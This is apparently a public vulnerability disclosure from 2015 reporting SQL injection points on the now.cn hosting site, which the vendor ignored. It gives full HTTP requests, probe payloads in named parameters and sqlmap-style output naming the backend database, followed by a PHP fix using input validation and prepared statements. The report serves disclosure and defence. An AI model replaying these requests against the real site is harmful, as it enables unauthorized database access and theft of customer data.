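2015-10-22: Details sent to the vendor; waiting for the vendor to process them
2015-10-27: The vendor chose to ignore the vulnerability; details disclosed to the public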
RT
Injection point 1:

POST /GProduct/GOrder_submit.net HTTP/1.1
Content-Length: 342
Content-Type: application/x-www-form-urlencoded
Referer: http://www.now.cn:80/
Cookie: PHPSESSID=og8dknooforjuqnrnleclvo9vjaik2kg; IDReaded_C=%2C14664; reference=%21M2OT_236; NOWA=%2B236_241;
Host: www.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Submit2=%e7%a1%ae%20%e5%ae%9a&ACC=CN&ACity=San%20Francisco&AEmail=sample%40email.tst&AFax=317-317-3137&AMobile=987-65-4329&AName=jlsawjdd&AName_GB=jlsawjdd&AOrganization=1&AOrganization_GB=1&APC=1&ASP=1&AStreet=3137%20Laguna%20Street&AStreet1=3137%20Laguna%20Street&ATel=1&chrMemo%5b%5d=1'%22&chrProd=&IDProd=&showMess%5b%5d=&SSP=1&tld%5b%5d=

The parameters chrMemo%5b%5d and tld%5b%5d are injectable.
Second injection point:

http://www.now.cn/news/media_list.php?page=%5c&seach=1

POST parameters:
Submit=%e6%90%9c%20%e7%b4%a2&page_variable_names=dmruvwgw&seach=1

The page parameter is vulnerable to SQL injection.
Third SQL injection point:

http://www.now.cn/web/template.php?Category=8&id=%5c&page=4&panel=112

The id parameter is vulnerable to SQL injection.

web application technology: Apache, PHP 5.5.18
back-end DBMS: MySQL 5.1
current user: '[email protected].%'
current user is DBA: False
available databases [1]:
[*] db_now_net_cn
http://www.now.cn/domain-admin/bulkDNSChangeEpp_submit.net

POST parameters:
Submit=%e7%a1%ae%e5%ae%9a&agreement=*&backURL=domain_list.net%3ffIDDomainFolder%3dnull&button=%e6%b7%bb%e5%8a%a0%e6%9b%b4%e5%a4%9a%e5%9f%9f%e5%90%8d%e6%9c%8d%e5%8a%a1%e5%99%a8&Cancel=%e5%8f%96%e6%b6%88&domains=&NSList%5b%5d=1&SPassword=g00dPa%24%24w0rD&Su=%e8%bf%94%20%e5%9b%9e&Submit=%e4%bf%ae%20%e6%94%b9

The parameters agreement, backURL, button, Cancel, domains, NSList%5b%5d, SPassword, Su and Submit are all injectable.
Filter the parameters.
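One way to apply that fix to the parameter types named in this report (numeric ones such as id and page, array ones such as chrMemo[] and tld[]), as an added example that is not the vendor's code. The helpers int_param and list_param and the table and column names are hypothetical, and an in-memory SQLite database stands in for the MySQL backend.

```php
<?php
// Added example; table and column names are hypothetical. In-memory SQLite
// stands in for the site's MySQL backend so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE templates (id INTEGER PRIMARY KEY, category INTEGER, name TEXT)');
$pdo->exec("INSERT INTO templates (id, category, name) VALUES (1, 8, 'blue')");
$pdo->exec('CREATE TABLE order_notes (memo TEXT)');

// Numeric parameters (id, page, Category): a positive integer or an exception.
function int_param(array $src, $name)
{
    $val = isset($src[$name]) && is_string($src[$name])
        ? filter_var($src[$name], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]])
        : false;
    if ($val === false) {
        throw new InvalidArgumentException("rejected parameter: $name");
    }
    return $val;
}

// Array parameters (chrMemo[], tld[], NSList[]): a bounded flat list of strings.
function list_param(array $src, $name, $max = 50)
{
    $raw = isset($src[$name]) ? $src[$name] : [];
    if (!is_array($raw) || count($raw) > $max
        || array_filter($raw, 'is_string') !== $raw) {
        throw new InvalidArgumentException("rejected parameter: $name");
    }
    return array_values($raw);
}

// Constructed input mirroring the probes in the report.
$get  = ['Category' => '8', 'id' => '1'];
$post = ['chrMemo' => ["1'\""]];                 // chrMemo[]=1'%22 after decoding

$find = $pdo->prepare('SELECT name FROM templates WHERE category = ? AND id = ?');
$find->execute([int_param($get, 'Category'), int_param($get, 'id')]);
echo 'template: ', $find->fetchColumn(), "\n";
try {
    int_param(['id' => '\\'], 'id');             // id=%5c after decoding
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}

// Free text is bound as a value, never concatenated, so quotes stay data.
$ins = $pdo->prepare('INSERT INTO order_notes (memo) VALUES (?)');
foreach (list_param($post, 'chrMemo') as $memo) {
    $ins->execute([$memo]);
}
echo 'stored: ', $pdo->query('SELECT memo FROM order_notes')->fetchColumn(), "\n";
```

Against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so that binding is done by server-side prepared statements.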
Severity: No impact (ignored by vendor)
Ignored at: 2015-10-27 09:34
Vulnerability Rank: 15 (WooYun rating)
None yet